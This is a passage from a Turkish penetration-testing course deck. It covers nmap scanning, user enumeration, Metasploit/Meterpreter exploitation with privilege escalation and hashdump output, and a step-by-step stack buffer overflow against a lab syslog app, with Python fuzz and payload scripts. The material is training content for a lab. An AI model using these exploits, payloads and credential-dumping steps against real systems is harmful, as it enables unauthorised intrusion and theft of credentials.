sisteminin versiyonuna uygun hale getirilmesi gerekebilir. Çünkü exploit’un
atlama adresi olarak kullandığı bölümdeki kodlar işletim sistemi
güncellemesi ile ortadan kalkmış veya kaymış olabilir)
• Envanter takibi (güvenlik yöneticisi olarak ağınıza bağlı cihazları takip etmek
için bu yöntemi kullanabilirsiniz)
• İzinsiz ve tehlikeli cihazların tespiti
• Sosyal mühendislik (hedeflediğiniz bir kullanıcı hakkında size destekleyici
bilgi sağlayabilir)
İşletim Sistemi ve Versiyonu Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
# nmap -O 192.168.163.131
İşletim Sistemi ve Versiyonu Tespiti
Nmap, firewall'u aktif bir bilgisayarı -O opsiyonuyla işletim sistemi
tespiti amacıyla taradığımızda en az 1 AÇIK ve 1 KAPALI port
bulamadığı için ürettiği sonuçların sağlıklı olmayabileceğini belirtti.

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
İşletim Sistemi ve Versiyonu Tespiti
Hedefteki sunucumuz
Windows 7 Home Basic – SP1
işletim sistemine sahip

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
İşletim Sistemi ve Versiyonu Tespiti
İşletim sistemi enumeration
taramasını bu defa Firewall
pasif iken yapacağız

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Firewall pasif hale
getirildiğinde nmap biraz daha
daraltılmış bir tahmin yapabildi
İşletim Sistemi ve Versiyonu Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
NMAP Aggressive Scan
# nmap –A 192.168.163.131
Servis
enumeration
“nmap”in -A (Aggressive Scan)
opsiyonu ile servis versiyonu,
işletim sistemi tespiti, script
scanning ve traceroute birlikte
yapılıyor.
İşletim sistemi
enumeration

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Script scan
sonuçları
Traceroute
sonuçları
NMAP Aggressive Scan
# nmap -A 192.168.163.131

KULLANICI TESPİTİ
Windows 2000 işletim sistemi
modern işletmelerde artık
karşılaşma ihtimalimizin düşük
olduğu bir işletim sistemi. Ancak
en meşhur kullanıcı tespit
yöntemlerinden birisi olduğundan
ve belli bir yaşı aşkın işletmelerde
kıyıda köşede kalmış böyle bir
sunucuya rastlama ihtimaliniz
olduğundan null session
enumeration’dan bahsetmeden
geçemeyiz.
Null Session Enumeration

KULLANICI TESPİTİ
Null Session Enumeration
"enum4linux" aracı "Null
Session"a imkan veren
sunucularda kullanıcı tespiti ve
parola politikası tespiti de
yapabilmektedir.

KULLANICI TESPİTİ
Hedef işletim sisteminin bir
Windows 2000 sunucu olduğunu
görebiliriz.
Null Session Enumeration

KULLANICI TESPİTİ
Null session’ı engellemek için gerekli olan restrictanonymous registry
değerinin “0” olması sayesinde bu bilgilere erişebiliyoruz. Güvenli bir
konfigürasyonda bu değerin “2” olması beklenirdi.
Null Session Enumeration

KULLANICI TESPİTİ
Daha evvel snmp-check
aracı ile SNMP servisinden
bilgi edinmiştik.
Bu örnekte Metasploit'un
auxilary modüllerinden
snmp_enum modülünü
kullandık.
SNMP Enumeration

KULLANICI TESPİTİ
Windows
SNMP Enumeration
Daha önce de gördüğümüz
gibi Windows sunucu
kullanıcı hesaplarının
SNMP üzerinden elde
edilmesine imkan verdi.
Hedef bilgisayarımız bir
Windows 7 idi.

KULLANICI TESPİTİ
Linux
SNMP Enumeration
Kali üzerinde aktif hale
getirdiğimiz SNMP servisi
de bilgi sızdırıyor, ancak
kullanıcı isimlerinin
sağlanması gibi bir
fonksiyonalitesi yok.

KULLANICI TESPİTİ
Arama motorlarından E-
Posta adresleri tespiti
internet'ten VPN, Terminal
Servisi, E-Posta Sunucu
erişimleri, sosyal
mühendislik amaçlarına
hizmet edebilir
E-posta Adreslerinin Tespiti

KULLANICI TESPİTİ
E-posta Adreslerinin Tespiti
Kuruma ait web siteleri spider
edilerek web sayfalarında geçen
e-posta adresleri aktif olarak
aranabilir.
Burp-Suite aktif veya pasif olarak
gözlemlediği e-posta adreslerini
raporlamaktadır.

KULLANICI TESPİTİ
E-posta Adreslerinin Tespiti
Burp-Suite uyarı örneği

KULLANICI TESPİTİ
Ofis dokümanları metadata'ları
internet'ten VPN, Terminal Servisi, E-
Posta Sunucu erişimleri, sosyal
mühendislik saldırılarına yardımcı olabilir
Ofis Metadata'larından Kullanıcı Adı Tespiti
Google'da "filetype" ve "site" anahtar
kelimeleri ile hedef daraltılarak inceleme
yapılabilir.

KULLANICI TESPİTİ
Ofis Metadata'larından Kullanıcı Adı Tespiti

KULLANICI TESPİTİ
Öntanımlı Kullanıcılar
Hedef sunucu ve servis tespit edilebilirse
bu örnekte olduğu gibi öntanımlı parola
listelerinden veya ilgili sistemin
dokümantasyonu içinden öntanımlı
kullanıcılar aranabilir.

KULLANICI TESPİTİ
EGZERSİZ
• Kali üzerinde Nmap'in scriplerinin bulunduğu dizini tespit ediniz
ve içindeki script dosyalarının isimlerini inceleyiniz.
• oracle-enum-users.nse script'inin Oracle'ın öntanımlı portu
dışında bir portu kullanması halinde nasıl bir değişikliğe tabi
tutulması gerekebilir?
• Nmap script scan için gerekli kullanım kurallarını nmap'in man
page'inden inceleyiniz.

KULLANICI TESPİTİ
Web uygulamaları aracılığı ile kullanıcı sızdırma
Hedef kuruma ait bazı web uygulamalarının doğru ve hatalı kullanıcı kodları ile
yapılan erişim denemelerinde ayırt edici hata yanıtları döndürecek bir şekilde
kod geliştirilmeleri halinde (kimi durumlarda şans, kimi durumlarda tahmin
edilebilir kullanıcı kodlarının kullanıcılara atanması sayesinde) net olarak belli bir
kullanıcı kodunun geçerli olup olmadığını tespit edebiliriz. Bu tespit yapıldıktan
sonra da parola politikasına bağlı olarak kaba kuvvet saldırısı ile web
uygulamasına erişim gerçekleştirmemiz söz konusu olabilir.
SMTP enumeration
Açıkçası pek karşılaşılmasa da EXPN ve VRFY SMTP komutları ile ismini bizim
verdiğimiz kullanıcıların hedef sistem üzerinde tanımlı olup olmadıklarını tespit
edebiliriz. Ancak bu tür bir testte hedefi doğru belirleyebilmeniz için zaten
şüpheli öntanımlı kullanıcıları hedef almanız lazım. Bu durumda SMTP
enumeration yöntemi sadece basit bir doğrulama imkanı sunabilir.
Diğer Kullanıcı Tespit Yöntemleri

METASPLOIT
VE
METERPRETER

İÇERİK
• Metasploit Kullanımı
• Meterpreter Kullanımı
• Post Exploitation ve Yetki Yükseltme
• Handler Modülü
• Hashdump

METASPLOIT KULLANIMI
Metasploit'in en sık kullanılan
ve desteklenen arayüzü konsol
arayüzüdür.

METASPLOIT KULLANIMI
search type:exploit allmedia
Senaryo 2'de manuel olarak
gerçekleştirdiğimiz adımları bu
defa Metasploit üzerinde
gerçekleştirmeyi deneyeceğiz.

METASPLOIT KULLANIMI
use exploit/windows/misc/allmediaserver_bof

METASPLOIT KULLANIMI
netdiscover -r 192.168.163.0/24
Konsol arayüzünün avantajlarından
bir tanesi de işletim sistemi
komutlarını konsoldan ayrılmadan
çalıştırabilmemizdir.

METASPLOIT KULLANIMI
Hedef sistemimizin IP adresini
görüyoruz.

METASPLOIT KULLANIMI
set rhost 192.168.163.140

METASPLOIT KULLANIMI
exploit
Metasploit öntanımlı olarak
meterpreter payload'u
kullanıyor, bu yüzden payload
tanımlamadan da "exploit"
komutunu çalıştırabiliyoruz.

METERPRETER KULLANIMI
hashdump (Meterpreter
komutu)
Meterpreter payload'umuz
çalıştığında desteklenen
meterpreter komutlarını "help"
komutuyla görebiliriz.
Hashdump komutunun yanıt
döndürebilmesi için mevcut
erişim haklarımız yeterli
olmadı.

METERPRETER KULLANIMI
getsystem
Haklarımızı yükseltmek için
Meterpreter'in "getsystem" komutunu
kullanıyoruz
Ancak bu işlem de başarısız oluyor.
Bunun nedeni kullanılan payload'un
X86 mimarisi için olması da olabilir,
ancak exploit ettiğimiz Allmedia
sunucusu bir X86 uygulama olduğu için
bir X64 payload kullanamadık.
Denemek isterseniz bu bağlantı
üzerinden ayrı bir X64 exe payload
atılarak gözlemleyebilirsiniz.

METERPRETER KULLANIMI
run post/windows/gather/win_privs
win_privs post exploitation
modülünü kullanarak erişim
sağladığımız kullanıcının haklarını
ve hedef sunucuda UAC (User
Account Control) kontrolünün aktif
olup olmadığını kontrol ediyoruz.
Local Admin grubundayız,
ancak UAC'de aktif olduğu
için Admin haklarımızı
kullanamıyoruz.

METERPRETER KULLANIMI
Windows 7 işletim
sistemimiz üzerinde UAC
kontrolünün aktif olduğunu
görebiliriz.

POST EXPLOITATION VE YETKİ YÜKSELTME
Bu defa yetki yükseltme işlemimizi yine bir lokal exploit
kullanarak, ancak işlemimizi tamamen Metasploit
platformunun kolaylıklarını kullanarak gerçekleştireceğiz.
search local

POST EXPLOITATION VE YETKİ YÜKSELTME
Karşımıza çıkan Metasploit lokal exploit modüllerini sırası ile
mevcut Meterpreter oturumumuz üzerinden deneyebiliriz. Biz
daha önceden çalıştığını bildiğimiz bir lokal exploit'i kullanarak
ilerleyelim.

POST EXPLOITATION VE YETKİ YÜKSELTME
show options
set session 1

POST EXPLOITATION VE YETKİ YÜKSELTME
run
whoami

POST EXPLOITATION VE YETKİ YÜKSELTME
Meterpreter'in "hashdump" fonksiyonunu kullanabilmek için
mevcut payload'umuzu "windows/x64/meterpreter/reverse_tcp"
payload'u ile değiştirelim ve lokal exploit'umuzu tekrar çalıştıralım.

POST EXPLOITATION VE YETKİ YÜKSELTME
Yeni payload'umuzla bir
Meterpreter oturumu alabildik.

POST EXPLOITATION VE YETKİ YÜKSELTME
Bağlı olduğumuz kullanıcı adına
baktığımızda "SYSTEM" kullanıcı
olduğumuzu görebiliyoruz.

"hashdump" komutu ile sistem üzerindeki parola hash'lerini görüntüleyebildik.
Bu hash değerlerini daha sonra parola saldırısında kullanabiliriz.
HASHDUMP
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:979357191cb4f445b47292af934fd2a7:::

BELLEK
TAŞMA
AÇIKLIKLARI

İÇERİK
• Stack Tabanlı Bellek Taşması
• Kullanılacak Araçlar
• Uygulamanın Fuzz Edilmesi
• Python Script
• EIP Register Kontrolü
• Stack Alanı
• Bad Char
• Return Address – JMP ESP
• Shellcode
• Metasploit’ Exploit Ekleme Adımları

STACK TABANLI BELLEK TAŞMASI
STACK’İN KULLANIM AMAÇLARI
• Fonksiyon lokal değişkenleri için hafıza alanı sağlaması
• Bir fonksiyon çağrıldığında çağrılan fonksiyondan çıkıldığında
dönülecek instruction adresinin saklanması
• Çağıran fonksiyonun stack taban adresinin saklanması
• Çağrılan fonksiyona aktarılacak parametrelerin saklanması

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Yüksek Adres
Düşük Adres
Pseudo
Assembly
esp

STACK TABANLI BELLEK TAŞMASI
TEMEL X86 REGISTER’LARI
EIP
Bir sonra çalışacak olan instruction’ın adresi
EBP ve ESP
İçinde bulunulan fonksiyonun stack frame’inin taban ve tavan adreslerini
barındıran register’lar
EAX, EBX, ECX, EDX, ESI, EDI
Genel amaçlı register’lar
EFLAGS
Çeşitli instruction’lar tarafından etkilenen ve kullanılan bayrakları barındıran 32
bit’lik bir register

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
call main
ya da
call 0x00412345
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
push ebp
mov ebp, esp
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP
saklanan EBPebp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
sub esp, 0x190
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık alan
ebp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
push 0xA
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık alan
0x0A000000
ebp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
call f1
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık alan
0x0A000000
saklanan EIP (main)
ebp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
push ebp
mov ebp, esp
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık alan
0x0A000000
saklanan EIP (main)
saklanan EBP (main)
ebp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
sub esp, 0x28
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
esp
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
saklanan EIP (main)
saklanan EBP (main)
ebp
0x28 byte’lık tanımsız
alan

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
mov [ebp-4], 0x0
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
saklanan EIP (main)
saklanan EBP (main)
ebp
0x24 byte’lık tanımsız
alan
0x00000000
esp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
mov ebx, [ebp+8]
mov [ebp-8], ebx
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
saklanan EIP (main)
saklanan EBP (main)
0x20 byte’lık tanımsız
alan
0x00000000
0x0A000000
esp
ebp

STACK TABANLI BELLEK TAŞMASI
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
memset v.b.
Fonksiyonla
AAA...AAA
sabitinin ayrılan
hafıza alanına
yazılması
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
saklanan EIP (main)
saklanan EBP (main)
0x20 byte’lık tanımsız
alan
0x00000000
0x0A000000
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
esp
ebp

STACK TABANLI BELLEK TAŞMASI
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
xor eax, eax
add esp, 0x28
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
saklanan EIP (main)
saklanan EBP (main)
0x41414141
0x41414141
0x41414141
0x41414141
espebp
EAX = 0x00000000

STACK TABANLI BELLEK TAŞMASI
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
pop ebp
ret
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
0x41414141
0x41414141 esp
EBP = 0x41414141
EIP = 0x41414141

STACK TABANLI BELLEK TAŞMASI
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
0x41414141
int f1(int girdi)
{
int i=0;
int x=girdi;
char adSoyad[32];
adSoyad="AAA...AAA";
return 0;
}
int main()
{
char[400]="";
f1(10);
printf("def");
return 0;
}
Pseudo Kod Pseudo
Assembly
????????
Stack
main fonksiyonunu çağıran
fonksiyonun stack frame’i
Düşük Adres
Yüksek Adres
saklanan EIP
saklanan EBP
0x190 byte’lık
tanımsız alan
0x0A000000
0x41414141
0x41414141 esp
EIP = 0x41414141

BUFFER OVERFLOW
• Bu bölümde Buffer Overflow yöntemi kullanarak
shell açma konusundan bahsedeceğiz. Shell açmak
için gerekli çalışmaları yaptıktan sonra
oluşturacağımızı exploiti Metasploit framework
üzerine bir modül olarak ekleyeceğiz.
• Adımlarımızı BTRisk tarafından bu konuya özel olarak
geliştirilen BTRSyslog uygulaması üzerinde
gerçekleştireceğiz.

UYGULAMA HAKKINDA
• BTRSyslog uygulaması UDP 514 portunu dinleyerek
kendisine gelen paketleri toplamaktadır. Bu nedenle
Buffer Overflow adımlarını izlerken bizde bu port ve
protokolden faydalanacağız.

UYGULAMA TESTİ
• hping3 192.168.2.4 -p 514 --udp --data 1

KULLANILACAK ARAÇLAR
• Immunity Debugger
http://debugger.immunityinc.com/ID_register.py
• mona.py script'i
https://www.corelan.be/index.php/2011/07/14/mona-
py-the-manual/
Mona.py script'imizi Immunity Debugger üzerinde kullanılabilmesi için bu dosyayı şu dizine
kopyalamalıyız:
C:Program Files (x86)Immunity IncImmunity DebuggerPyCommands

UYGULAMANIN FUZZ EDİLMESİ
• BTRSyslog uygulaması UDP 514 portundan girdi
alıyor. Bu porta gönderilecek verileri üretmek ve
herhangi bir bellek taşması bulunup bulunmadığını
test etmek amacıyla bir fuzzing script'i kullanacağız.

FUZZ SCRIPT (PYTHON)
#!/usr/bin/python
import socket, time
buffer = ["A"]
counter = 10
while len(buffer) <=20:
buffer.append("A" * counter)
counter = counter + 10
for strings in buffer:
time.sleep(1)
print "Buffer : %s byte" % len(strings)
s=socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('192.168.2.7', 514))
s.send(strings)
s.close
Bu script ilk olarak tek bir "A" karakteri
gönderecek, sonraki pakette 10 adet "A" karakteri
ve daha sonraki her pakette de 10'ar tane daha
"A" karakteri ekleyerek veri gönderilecek. Yani:
"A"
"AAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
... şeklinde

FUZZING – IMMUNITY DEBUGGER
• Fuzzing işlemi sırasında hata alırsak hatanın alındığı
anda belleğin durumunu ve register'ların değerlerini
net olarak görebilmek için uygulamamıza Immunity
Debugger ile "attach" olacağız (veya BTRSyslog'u
doğrudan Immunity Debugger içinden başlatabiliriz).
• Debugger uygulamaya attach edildiğinde (veya
uygulama debugger ile başlatıldığında) debugger
uygulamayı bir software breakpoint ile durdurur.
Uygulamanın çalışmaya devam edebilmesi için "Run
program" tuşuna basılır.

• Uygulamamız belli bir veri uzunluğu aşıldığında
hata aldı ve kontrol debugger'a devredildi.
FUZZING – IMMUNITY DEBUGGER
Immunity Debugger'ın CPU view'ında sağ
üst köşede Register'ların değerlerini
görebiliriz. Buraya göz attığımızda hata
alındığı anda EIP değerinin 0x41414141
olduğunu görüyoruz.

• 0x41 değeri "A" karakterimizin ASCII Hex karşılığıdır.
• EIP değerini bizim gönderdiğimiz bir veri ile
ezebilmek demek uygulama akışına müdahale imkanı
elde ettiğimiz anlamına gelmektedir.
• EIP register'ına yazacağımız değerin anlamlı bir adres
olabilmesi için başarmamız gereken ilk adım EIP
değerine müdahale edebildiğimiz 4 byte'lık (yani 32
bit'lik) veri alanının gönderdiğimiz veri (payload)
içinde tam olarak nerede olduğunu tespit etmektir.
FUZZING – IMMUNITY DEBUGGER

EIP REGISTER KONTROLÜ
• EIP registerına müdahale edebildiğimiz offset değerini
tespit edebilmek için metasploit framework içerisinde
bulunan "pattern_create.rb" scriptini kullanacağız.
• Bu script ile 200 byte uzunluğunda bir pattern
oluşturacağız.

./pattern_create.rb -l 200
EIP REGISTER KONTROLÜ

#!/usr/bin/python
import socket
buffer =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3
Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7A
c8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6
Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"
s=socket.socket
(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(('192.168.2.13', 514))
s.send(buffer)
s.close
FUZZING – IMMUNITY DEBUGGER
Oluşturduğumuz pattern'ı
BTRSyslog'a göndermek için yandaki
script'i kullanabiliriz.
Ancak BTRSyslog uygulamamızı
baştan başlatmayı unutmayınız.

Register'lar
EIP = 0x65413565Instruction'lar
EIP REGISTER KONTROLÜ
Stack alanı
Pattern BTRSyslog sunucusuna gönderildiğinde yine hata aldık, ancak bu defa
EIP değeri 0x65413565 oldu. Şimdi sıra bu verinin tam olarak hangi offset'te
yer aldığını bulmaya geldir.

EIP REGISTER KONTROLÜ
./pattern_offset.rb -q 65413565

• 136. offset değerinin doğruluğunu test etmek için şu
formatta bir payload üretebiliriz:
EIP REGISTER KONTROLÜ
buffer = "A" * 136 + "B" * 4 + "C" * 60
AAAAAAAAAAAAA...AAAAAABBBBCCCCCCCC...CCC

EIP REGISTER KONTROLÜ
#!/usr/bin/python
import socket
buffer = "A" * 136 + "B" * 4 + "C" * 60
s=socket.socket (socket.AF_INET,socket.SOCK_DGRAM)
s.connect(('192.168.2.13', 514))
s.send(buffer)
s.close

• Scriptimiz çalıştıktan sonra EIP register'ının
0X42424242 değerleri ile ezildiğini görüyoruz. Bu
durumda EIP offset değerimizin doğruluğundan emin
olabiliriz.
EIP REGISTER KONTROLÜ

STACK ALANI
• EIP register değerini manipüle ettikten sonra sıra
belleğe kendi kodumuzu yazmaya geldi. İşe yarar bir
shellcode'un boyutu 350-400 byte civarında olacaktır.
• EIP değerini ezmeden önce kullandığımız alan 136
byte olduğundan tercihimiz EIP register'ının ezildiği
noktadan sonra shellcode'umuzu yerleştirmek olabilir.
• Ancak shellcode'umuzu yazdığımızda Stack alanının
başlangıç sınırını aşmayacağımızdan emin olmamız
lazım. Aksi taktirde payload'umuz yazılırken hata alırız
ve daha kodumuz çalışmadan uygulama sonlanır.

#!/usr/bin/python
import socket
buffer = "A" * 136 + "B" * 4 + "C" * 460
s=socket.socket (socket.AF_INET,socket.SOCK_DGRAM)
s.connect(('192.168.2.13', 514))
s.send(buffer)
s.close
EIP'yi ezdiğimiz alandan sonra
yeterli alan bulunup
bulunmadığını test etmek için
payload'umuza 460 byte'lık bir
değer ekleyelim.
STACK ALANI

Bu noktada 2 iyi haberimiz var:
(1) Hata alındığında ESP register'ı
payload'umuzun bir bölümüne işaret
ediyor.
(2) 460 byte'lık veriyi stack'e yazabildik ve
stack limitini aşmadık.
STACK ALANI

Register'larımızdan birisinin payload'umuza işaret etmesi
önemli çünkü:
• Modern işletim sistemlerinde ASLR
uygulandığından stack alanımızın adresi her
yüklemede değişecektir. Bu yüzden payload'umuzu
çalıştırabilmek için STACK adresine güvenemeyiz.
• Ancak uygulamanın bellek alanına yüklenen ve
ASLR uygulanmayan bir modülün (yani bir başka
DLL veya EXE imajının) içinde JMP ESP, CALL ESP,
v.b. instruction'lar varsa bu modülün hafızaya
yerleştiği alan her defasında sabit olacağından bu
modülleri atlama noktası olarak kullanabiliriz.
STACK ALANI

• Gerçek payload'umuzu oluşturmaya başlamadan önce
payload'umuzun belleğe yazılmasına engel olabilecek
karakterlerin (bad chars) tespit edilmesi
gerekmektedir.
• Bu karakterlerin en tipik olanı strcpy() gibi
fonksiyonların belleğe yazmasına son vermesine
neden olan "0x00" yani null byte değeridir. Ancak
bunun dışında farklı değerler de soruna yol açabilir.
• Bu yüzden daha fazla ilerlemeden önce kötü
karakterleri tespit etmemizde fayda var.
KÖTÜ KARAKTERLER

!mona config -set workingfolder c:logs%p
Kötü karakterleri tespit etmek için manuel yöntemi kullanabiliriz.
Ancak "mona.py" script'inden faydalanacağız. Bunun için öncelikle
"mona"nın çıktılarını yazabilmesi için bir dizin belirlememiz lazım.
KÖTÜ KARAKTERLER

!mona bytearray -b "x00"
"mona" ile "x00" hariç tüm byte'ları içerecek bir bytearray
oluşturuyoruz. "mona" bir "txt" bir de "bin" dosyası oluşturuyor.
KÖTÜ KARAKTERLER

"bin" dosyası "mona" ile
bellek karşılaştırması için
kullanacağımız dosya
"txt" dosyası ise exploit
kodumuz içinde
kullanılabilecek formatta veri
içeriyor
KÖTÜ KARAKTERLER

#!/usr/bin/python
import socket
badchars =
("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")
buffer = "A" * 136 + "B" * 4 + badchars
s=socket.socket (socket.AF_INET,socket.SOCK_DGRAM)
s.connect(('192.168.2.13', 514))
s.send(buffer)
s.close
"CC" payload'umuzun yerine "mona" ile
oluşturduğumuz byte array'i yerleştirerek tekrar
sunucumuza gönderiyoruz.
KÖTÜ KARAKTERLER

KÖTÜ KARAKTERLER
ESP register değerinin üzerinde sağ
klikleyerek "Follow in Dump"
seçeneğini seçiyoruz ve sol altta bu
alandaki verileri görebiliyoruz.
"x09" byte'ından sonraki kesinti
hemen göze çarpıyor. Ancak biz kötü
karakterlerin tespitinde mona'dan
da faydalanmayı göreceğiz.

KÖTÜ KARAKTERLER
!mona compare -f C:logsBTRSyslogbytearray.bin -a 06C3F450
"mona"nın compare komutuyla
oluşturduğumuz binary dosya ile
bellek'te 0x06C3F450 adresinden
başlayan alanı karşılaştırıyoruz.
Mona bize 9. byte'tan sonra bozulma
olduğunu x00 ve x0a karakterlerinin
kötü karakter olduklarını söylüyor.

!mona bytearray -b "x00x0a"
"x0a" karakterini kötü karakter olarak belirlediğimiz için "mona" ile "x00"
ve "x0a" hariç tüm byte'ları içerecek yeni bir bytearray oluşturuyoruz.
KÖTÜ KARAKTERLER

#!/usr/bin/python
import socket
badchars =
